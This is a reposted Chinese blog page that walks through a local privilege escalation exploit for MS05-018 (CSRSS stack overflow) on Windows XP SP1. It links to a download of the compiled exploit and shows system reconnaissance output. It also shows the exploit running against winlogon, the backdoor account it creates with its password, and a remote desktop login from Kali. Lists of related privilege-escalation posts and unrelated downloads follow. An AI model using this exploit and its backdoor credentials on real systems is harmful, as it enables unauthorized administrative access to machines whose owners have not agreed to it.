Windows XP SP1 Privilege Escalation

最新推荐文章于 2025-04-16 10:00:00 发布
最新推荐文章于 2025-04-16 10:00:00 发布
阅读量384 收藏
点赞数
原文链接:http://www.cnblogs.com/xiaoxiaoleo/p/8452004.html
版权
MS05-018

MS05-018
Works for Windows 2K SP3/4 | Windows XP SP1/2
Download ms05-018.exe:
https://github.com/xiaoxiaoleo/windows_pentest_tools/tree/master/%E6%8F%90%E6%9D%83%E5%B7%A5%E5%85%B7/windows%E6%8F%90%E6%9D%83%E5%B7%A5%E5%85%B7/MS05018%E2%80%94CSRSS.EXE%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/MS05018%E2%80%94CSRSS.EXE%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/tool

C:\WINDOWS\system32>systeminfo
systeminfo

Host Name:                 VULNBOX
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 1 Build 2600
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 12 Stepping 2 GenuineIntel ~3457 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\System32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: File 1
                           [02]: Q147222
                           [03]: KB893803v2 - Update

C:\Inetpub\wwwroot>MS05-018.exe
ms5.exe
MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0
Affect: Windows 2000 sp3/sp4 (all language)
Coded by eyas <eyas at xfocus.org> --->http://www.xfocus.net
compile by Iceskysl [IST] --->www.iceskysl.net

Usage: ms5.exe pid

[+] PID=440 Process=winlogon.exe

C:\Inetpub\wwwroot>MS05-018.exe 440
ms5.exe 440
MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0
Affect: Windows 2000 sp3/sp4 (all language)
Coded by eyas <eyas at xfocus.org> --->http://www.xfocus.net
compile by Iceskysl [IST] --->www.iceskysl.net

[+] FreeConsole ok.
[+] AllocConsole ok.
[+] Get Console Title OK:"ms5.exe 440"
[+] bingo! found hwnd=70038
[+] start search "FF E4" in ntdll.dll
[+] found "FF E4"(jmp esp) in 77FB59CC[ntdll.dll]
[+] CreateFileMapping OK!
[+] MapViewOfFile OK!
[+] Send Exploit!
[+] Done.

It's will successful  add user :
username=e
password=asd#321

root@kali:~# rdesktop -u e -p asd#321  x.x.x.x

转载于:https://www.cnblogs.com/xiaoxiaoleo/p/8452004.html

Microsoft Windows CSRSS Local Privilege Escalation Exploit (MS05-018)
孤剑之家
09-22 2308
文章整理:天天安全网   作者:佚名   发布时间:2005-09-09漏洞资料:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0551危险程度:中等影响范围:Microsoft Windows 2000/XP/2003解决办法:http://www.microsoft.com/technet/security/bulletin/ms
[LPE]Windows Local Privilege Escalation MS15-051
BraveWinds B10G
02-24 977
MS15-051GithubINFO| CVE-2015-1701 | Report 20150512 | Patch KB3045171 |Windows Kernel-mode Driver/ Win32k.sysEffectWindows 7/8/8.1Windows Server 2003/2008/2012TestingSource Code by zcgonvh Support Wind
巧装Windows XP SP1
守望
11-19 1796
自从Windows XP SP1中文版出来以后,许多网友就反映说多次尝试在线安装,均以失败告终,提示安装的语言不对。就算将它下载到本地硬盘,双击进行安装,还是以失败告终。有些人查资料、上网求助,得知改注册表就可以了,提示说:在“HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nis\Language”处,把子键“Default”和“InstallLa
[LPE]Windows Local Privilege Escalation MS14-058
BraveWinds B10G
02-24 891
MS14-058GithubINFO| CVE-2014-4113 | Report 20141014 | Patch KB3000061 |Windows Kernel-mode Driver/ Win32k.sysEffectWindows XP SP3Windows 7/8/8.1Windows Server 2003/2008/2012TestingSource Code by ? - S
windows提权工具推荐
weixin_30580341的博客
02-21 1180
Tools Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock (Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vuln...
windows提权基础大全
渗透测试研究中心
05-27 799
Not many people talk about serious Windows privilege escalation which is a shame. I think the reasons for this are probably (1) during pentesting engagements a low-priv shell is often all the pro...
【权限提升】windows平台-提权项目&MSF&CS&溢出漏洞
今天是几号的博客
02-04 2863
简介:WES-NG是一个基于Windows系统信息实用程序输出的工具,该实用程序提供了操作系统易受攻击的漏洞列表,包括对这些漏洞的任何利用。powershell运行(上传是为了收集系统打的补丁信息,作用等同于systeminfo,当无法上传文件时,可以用systeminfo中的信息覆盖KB.json文件)简介:这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免。覆盖项目KB.json文件(一定格式的操作系统信息 补丁信息等)
Windows提权基本原理
Fly_鹏程万里
06-22 2221
前言 没有多少人谈论在Windows下提权,是一件让人遗憾的事!我想,没有人这么做的理由有以下几点: 在渗透测试项目中,客户需要的验证就是一个低权限shell。 在演示环境,你经常就会得到管理员帐户。 meterpreter使你变得懒惰(getsystem = lazy-fu)。 最后的评估报告最终变成 – ->nessus安全认证扫描,微软安全基线分析…. 尽管通常的感觉是配置得当的windows是安全的。但是事实真的是这样吗?因此,让我们深入了解Windows操作系统的黑暗角落,...
【重点】Windows提权(5)
红肤色的博客
04-16 355
【重点】Windows提权(5)
51-52Windows密码安全性测试与Windows提权
XLbb的博客
06-19 1392
2、kali的【ophcrack】工具彩虹表hash暴力破解。
hackmap-[windows权限提升(windows提权思路)]
m0_43405474的博客
04-09 5088
hackmap-[windows权限提升{windows提权思路}]1.前言1.1.提权分类水平权限提升(越权)垂直权限提升1.2 windows提权概述2.windows基于WebShell提权2.1 前言2.1.1 asp大马 vs aspx大马(windows2003+IIS)1)asp大马2)aspx大马3)小结2.1.2 基于系统漏洞提权1)信息收集2)漏洞补丁对照表3)提权过程3.实战3.1针对2003 KB952004 提权实验step1:利用aspx大马进行信息搜集——补丁安装情况step2
Gtihub学习Micro8安全笔记(第一课)之windows提权-快速查找exp
小白渣的博客
06-19 737
专注APT攻击与防御 https://micropoor.blogspot.com/ 这是大佬他自己的博客,但是不知道为啥访问不了,可能是他那边没开docket 微软官方时刻关注列表网址: https://technet.microsoft.com/zh-cn/library/security/dn639106.aspx 比如常用的几个已公布的exp:KB2592799,KB3000061,KB2592799等。 快速查找未打补丁的exp,可以最安全的减少目标机的未知错误,以免影响业务。 命令行下执行检
EXP查询合集提权后渗透必备-------后渗透提权常用漏洞
L_lemo004的博客
10-20 733
后渗透提权常用漏洞 CVE-2019-0803 [An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory] (Windows 7/8/10/2008/2012/2016/2019) CVE-2018-8639 [An elevation of privilege vulnerability exists in
区块链_智能合约_Solidity_保险应用_基于以太坊的技_1744433266.zip
04-24
区块链_智能合约_Solidity_保险应用_基于以太坊的技_1744433266
【数据库管理】Mysql安装配置全流程:环境变量设置、服务安装与初始密码修改教程
04-24
内容概要:本文档详细介绍了在Windows系统上安装MySQL数据库的具体步骤。首先,需要配置系统环境变量,包括新建MYSQL_HOME变量并将其添加到PATH中;其次,创建并编辑my.ini配置文件,设置MySQL的基本参数如端口、字符集、数据存放目录等;接着,在命令行工具中通过一系列指令完成MySQL的初始化、服务安装、启动以及root用户的密码设置和权限调整。整个流程涵盖了从环境搭建到最终确保MySQL服务正常运行的所有关键环节。 适合人群:适用于有一定计算机操作基础,尤其是对数据库管理有一定兴趣或需求的技术人员。 使用场景及目标:①帮助用户在本地机器上成功部署MySQL数据库环境;②确保用户能够掌握MySQL的基本配置与管理技能,如环境变量配置、服务安装与卸载、用户权限管理等。 其他说明:在安装过程中可能会遇到一些常见问题,例如由于之前版本残留导致的服务安装失败,此时可以通过命令行删除旧服务(sc delete mysql)来解决。此外,为了保证安全性,务必及时修改root用户的初始密码。
【嵌入式系统】8051单片机启动文件STARTUP.A51代码解析:初始化堆栈指针与数据段及中断向量配置详解
最新发布
04-24
内容概要:`STARTUP.A51` 是 Keil C51 编译器自带的启动文件,用于初始化 8051 单片机的硬件和软件环境。该文件主要完成三个任务:初始化堆栈指针、清零内部数据存储器、跳转到主程序。文件中定义了内存模式(如 SMALL),并设置了堆栈指针的初始值为 0x60。接着通过循环将内部数据存储器的所有字节清零,确保程序开始时数据存储器的状态是确定的。此外,文件还列出了 8051 单片机的各个中断向量地址,并为每个中断提供占位符,实际的中断处理程序需要在其他文件中实现。最后,启动代码段初始化堆栈指针和数据段后,跳转到 `MAIN` 函数开始执行主程序。; 适合人群:对嵌入式系统开发有一定了解,尤其是使用 8051 单片机的开发者。; 使用场景及目标:①理解 8051 单片机启动文件的工作原理;②掌握如何初始化堆栈指针和数据段;③熟悉中断向量表的设置及其作用。; 其他说明:此文件为程序正常运行提供了必要的初始化操作,开发者可以根据具体需求修改该文件以适应不同的硬件和软件环境。
【电力系统故障诊断】基于行波理论的输电线路故障诊断方法研究:三相电流信号分析与小波变换波头检测系统设计(含详细代码及解释)
04-24
内容概要:该论文研究了一种基于行波理论的输电线路故障诊断方法。当输电线路发生故障时,故障点会产生向两侧传播的电流和电压行波。通过相模变换对三相电流行波解耦,利用解耦后独立模量间的关系确定故障类型和相别,再采用小波变换模极大值法标定行波波头,从而计算故障点距离。仿真结果表明,该方法能准确识别故障类型和相别,并对故障点定位具有高精度。研究使用MATLAB进行仿真验证,为输电线路故障诊断提供了有效解决方案。文中详细介绍了三相电流信号生成、相模变换(Clarke变换)、小波变换波头检测、故障诊断主流程以及结果可视化等步骤,并通过多个实例验证了方法的有效性和准确性。 适合人群:具备一定电力系统基础知识和编程能力的专业人士,特别是从事电力系统保护与控制领域的工程师和技术人员。 使用场景及目标:①适用于电力系统的故障检测与诊断;②能够快速准确地识别输电线路的故障类型、相别及故障点位置;③为电力系统的安全稳定运行提供技术支持,减少停电时间和损失。 其他说明:该方法不仅在理论上进行了深入探讨,还提供了完整的Python代码实现,便于读者理解和实践。此外,文中还讨论了行波理论的核心公式、三相线路行波解耦、行波测距实现等关键技术点,并针对工程应用给出了注意事项,如波速校准、采样率要求、噪声处理等。这使得该方法不仅具有学术价值,也具有很强的实际应用前景。
光伏-混合储能微电网能量管理系统:基于滤波算法的功率分配与SOC优化
04-24
内容概要:本文详细介绍了光伏-混合储能微电网能量管理系统的模型架构及其控制策略。首先探讨了光伏发电模块中的MPPT(最大功率点跟踪)控制,采用扰动观察法和改进型变步长策略来提高光伏板的发电效率。接着重点讲解了混合储能系统的功率分配,利用一阶低通滤波算法将功率需求分为低频和高频两部分,分别由蓄电池和超级电容处理。此外,文中还深入讨论了SOC(荷电状态)管理策略,确保电池和超级电容在不同工作状态下保持最佳性能。仿真结果显示,在光伏出力剧烈波动的情况下,系统能够有效地维持稳定的电压水平,并显著提高了储能设备的使用寿命。 适合人群:对光伏微电网、储能技术和能量管理系统感兴趣的科研人员、工程师和技术爱好者。 使用场景及目标:适用于研究和开发高效、可靠的光伏-混合储能微电网系统,旨在优化能量管理和提高系统稳定性。具体应用场景包括但不限于家庭光伏系统、小型微电网以及工业能源管理系统。 其他说明:文中提供了详细的代码实现和仿真结果,便于读者理解和复现实验。同时,模型设计采用了模块化思路,方便进行个性化修改和扩展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值